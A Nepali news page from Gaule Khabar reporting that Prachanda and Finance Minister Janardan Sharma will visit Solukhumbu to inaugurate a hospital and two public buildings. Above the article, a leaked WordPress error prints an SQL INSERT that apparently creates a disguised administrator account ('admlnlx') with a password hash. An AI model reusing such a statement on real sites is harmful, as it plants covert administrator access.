WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKJ94ZDWoen6Y21l09e2UisfIhIm5S.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 11:10:44', '', 'admlnlx', 'admlnlx')

प्रचण्ड र अर्थमन्त्री शर्मा सोलुखुम्बु आउँदै – Gaule Khabar

प्रचण्ड र अर्थमन्त्री शर्मा सोलुखुम्बु आउँदै

प्रचण्ड र अर्थमन्त्री शर्मा सोलुखुम्बु आउँदै

सोलुखुम्बु । पूर्वप्रधानमन्त्री तथा नेकपा (माओवादी केन्द्र) का अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ आउँदो असोज ३ गते जिल्ला सोलुखुम्बु आउने हुने भएको छ ।  थुलुङ दुधकोशीमा सन्चालन हुने ५० शैय्याको दुधकोशी सामुदायिक अस्पताल, गाउँपालिकाको प्रशासनिक पक्की भवन र  दुधकोशी बहुप्राविधिक शिक्षालय भवन एकसाथ उद्घाटन गर्नेगरी उहाँ सोलुखुम्बु आउन लागेको माओवादी केन्द्र, सोलुखुम्बु जिल्ला समन्वय समितिका संयोजक तथा थुलुङ गाउँपालिकाका अध्यक्ष असिम राईले जानकारी दिए ।

कार्यक्रममा प्रचण्डसँगै अर्थमन्त्री जनार्दन शर्मा ‘प्रभाकर’, प्रदेश नम्बर १ का आर्थिक मामिला तथा योजनामन्त्री अर्थमन्त्री इन्द्र आङ्बो ‘मौसम’, सोलुखुम्बुका प्रतिनिधि सभा सदस्य हेमकुमार राई ‘सुरवीर’, पुर्व मन्त्री बलबहादुर केसि लगायत कार्यक्रममा उपस्थीत हुने अध्यक्ष राईले बताए । उद्धघाटन कार्यक्रमको ९५ प्रतिशत तयारी पुरा भएको गाउँपालिकाले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका